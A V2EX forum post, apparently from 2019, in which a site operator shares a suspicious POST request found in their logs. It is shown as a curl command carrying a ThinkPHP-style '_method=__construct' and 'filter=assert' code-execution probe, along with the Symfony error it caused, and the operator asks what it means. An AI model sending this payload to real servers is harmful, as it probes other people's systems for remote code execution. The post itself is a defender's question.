线上收到了这样的一条 POST 请求

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

这是一个创建于 1920 天前的主题，其中的信息可能已经有所发展或是发生改变。

线上收到了这样的一条 POST 请求：

curl
-X POST
-H "Cache-Control: no-cache"
-H "Connection: Keep-Alive"
-H "Content-Length: 196"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Host: 115.159.128.48"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
--data "{"filter":["assert"],"server":{"REQUEST_METHOD":"die(md5(DIRECTORY_SEPARATOR))"},"_method":"__construct"}"
"http://115.159.128.48/index.php"

这个看着不像是正常的请求，而且它触发了这样一个报错：

Symfony\Component\HttpFoundation\Exception\SuspiciousOperationException: Invalid method override "__CONSTRUCT".

无效的方法重写？有人知道这样的请求是什么意思，为什么会尝试覆盖构造方法吗？

post

请求

construct

method

5 条回复 • 2019-08-14 11:31:51 +08:00